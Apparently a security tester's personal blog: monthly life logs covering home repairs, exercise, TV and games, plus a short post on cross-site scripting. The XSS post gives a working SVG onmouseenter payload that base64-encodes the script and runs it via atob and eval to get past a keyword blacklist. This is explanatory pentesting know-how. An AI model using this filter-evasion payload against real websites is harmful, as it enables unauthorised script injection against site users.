  • House – We finally got new windows installed having waited something like 6+ months. We moved at a point when you couldn’t get people to quote let alone fix anything. So this has been a massive boost. A new boiler has also gone in this month. I want to tackle at least painting everything now while we tread water for years waiting on the real work that I have to save up for.
  • Open Source – I got feedback from Daniel Card that my CVE-Offline project was out in the wild helping the Cyber 19 volunteers secure healthcare during covid-19. You never know where open source projects go or how they help. So this has been great to learn.
  • Research – [REDACTED BECAUSE WE HAVE NOT GOT THE CORPORATE BLOG POST OUT YET]. A bit of a tease I know.
  • Bank holiday weekend – I really needed this one to be good, and it really was. I BBQed twice. I did some gardening (well I murdered a bunch of stuff and trimmed things). I went for a walk in some trees with the kids. Did the whole “look at me I know things” stuff when Kid B walked through stinging nettles and I used a doc leaf to sort it out. Started a log fire in the garden at night and sat talking to my partner into the wee hours. It was a really relaxed long weekend and I just want more like it. I feel like we have been low on joy for a very long time and we are getting back to it.

That is the log for May.

XSS via HTML5 Events All over again

Back in 2018 I wrote a post about finding and exploiting XSS using the new(ish) event handlers in HTML 5. Those techniques paid out recently and I thought I’d write up the situation.

Using the lists provided in the earlier post I discovered the application allowed an “SVG” tag. Within that tag it allowed the “onmouseenter” event handler which is a useful one. This was not a classic XSS pop pop where the payload executes without user interaction. But it would pop pop with a relatively likely movement of the mouse over the image.

The target disallowed certain characters and appeared to have a blacklist approach for items such as “alert” etc. The solution to my problem that day was to base64 encode the payload, use “atob” to decode it, and then “eval” to execute it as listed below.

Raw Payload

alert(document.domain);

Base64 Encoded

YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=

Final Payload

<svg viewBox='0 0 100 100' onmouseenter=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))></svg> 

Nothing Earth shattering in this but until you put stuff out there you never know who that will save time for when they are googling for “XSS SVG tag” or something like that. Welcome weary traveller. I know there is lots of SVG related XSS shenanigans to be had but if you wanted a file to upload you would be elsewhere!

Hope that helps.

Captain’s Log: April 2021

Here is how I did in the new condensed table format.

TargetSummary
11k steps a dayI hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per weekWeek 1 – No. But I now have an exercise bike which I am starting a new journey on.
Week 2 – No.
Week 3 – No. Kids returned to school so I was walking rather than exercise.
Week 4 – No. Back on my bike now that school routine is established again.
1 technical blog a monthI sneaked out a wee post on enumerating RDP settings using PowerShell and release rdp-enum.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to goto visitor attractions again like the Transport Museum.
Record five songsI have recorded a mountain of partial songs. I just go sit in the garden and batter something out. Nothing quite fit for release this month.
OSWEI have not prioritised it this month.
Panic AttacksA clear month really. A few dicey moments but not full blown panic.

Other bits

  • Audiobooks 1 – carrying on with Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. With the school commute removed, and me no longer grinding out 11k steps a day otherwise I have barely touched the audiobooks. I should rethink my life!
  • Television 1 – Star Trek Discovery Season 3. Bravo to the makers they have really turned it around. While I didn’t hate STD season 1 and 2 I would say I was not in love with it. We didn’t get enough about the crew and the almost singular focus on one character was not working for me. It is Star Trek. I want some aliens. I want some exploration of humanity through the prism of different cultures. Maybe I like Season 3 because I have given up on that dream to some extent? Season 3 has been a breath of fresh air and we actively WANTED to watch the next episode. It was well done.
  • Television 2 – Titans. Oh wow… A DC property that isn’t just needlessly moody. With characters I know little or nothing about going into it. This show has been keeping me going on my exercise bike adventures. Like when I had a treadmill, I get a lot of TV shows watched while I exercise. I ran every minute of Sons of Anarchy, 24, and various other programmes in the past.
  • Game 1 – maquette. A PS Plus title of the month. It is gorgeous on so many levels. The sound track is sumptuous and the mechanics of the puzzles is so damn cute that your inner 5 year old will make you laugh. You honestly will.
  • Game 2 – Final Fantasy VII (remastered). I never played this before. I will start with that. Another PS Plus title which I would otherwise have not chosen to play. The story seems like it is going places. The kids are watching as I play along because of all the whizzy lights and swords and such. It is not a true open world because of the age of the title. You are very much on rails for the duration but it is going down well with me. Update: I finished this over the early May bank holiday before I got the post out. It was worth the time but suffered from massive cut scenes at times.

That is the log for April.